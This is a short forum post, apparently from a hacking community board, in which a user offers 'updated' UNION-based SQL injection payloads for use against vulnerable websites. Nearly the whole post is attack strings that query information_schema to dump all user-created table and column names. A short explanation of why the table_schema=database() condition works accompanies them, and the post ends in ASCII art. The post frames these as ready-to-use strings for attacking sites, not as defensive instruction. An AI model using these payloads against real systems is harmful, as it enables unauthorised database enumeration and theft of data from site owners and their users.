Some Updated Queries For SQL Injection

5 replies [Last post]
alcohologist
alcohologist's picture
Offline
SX Crew
Joined: 2010/11/22

I would just like to correct some queries for sql injection so that some would not have some problems in inserting queries to an sql vulnerable site.

PROBLEM

union select 1,2,group_concat(table_name),4,5 from information_schema.tables--

or

union select all 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()

And so here is the latest update in order to fix the problem:

Updated

union select 1,2,group_concat(table_name),4,5 +from+information_schema.tables+where+ table_schema=database()--

or

union select 1,2,group_concat(column_name),4,5 +from+information_schema.columns+where table_schema=database()--  

==================================
> table_schema is the database so when you type table_schema=database() it returns true and dumps all user created tables, which is also the same for columns

.(....\............../....)
. \....\........... /..../
...\....\........../..../
....\..../´¯.I.¯`\./
..../... I....I..(¯¯¯`\
...I.....I....I...¯¯.\...\
...I.....I´¯.I´¯.I..\...)
...\.....` ¯..¯ ´.......'
....\_________.·´

~o ~o ~o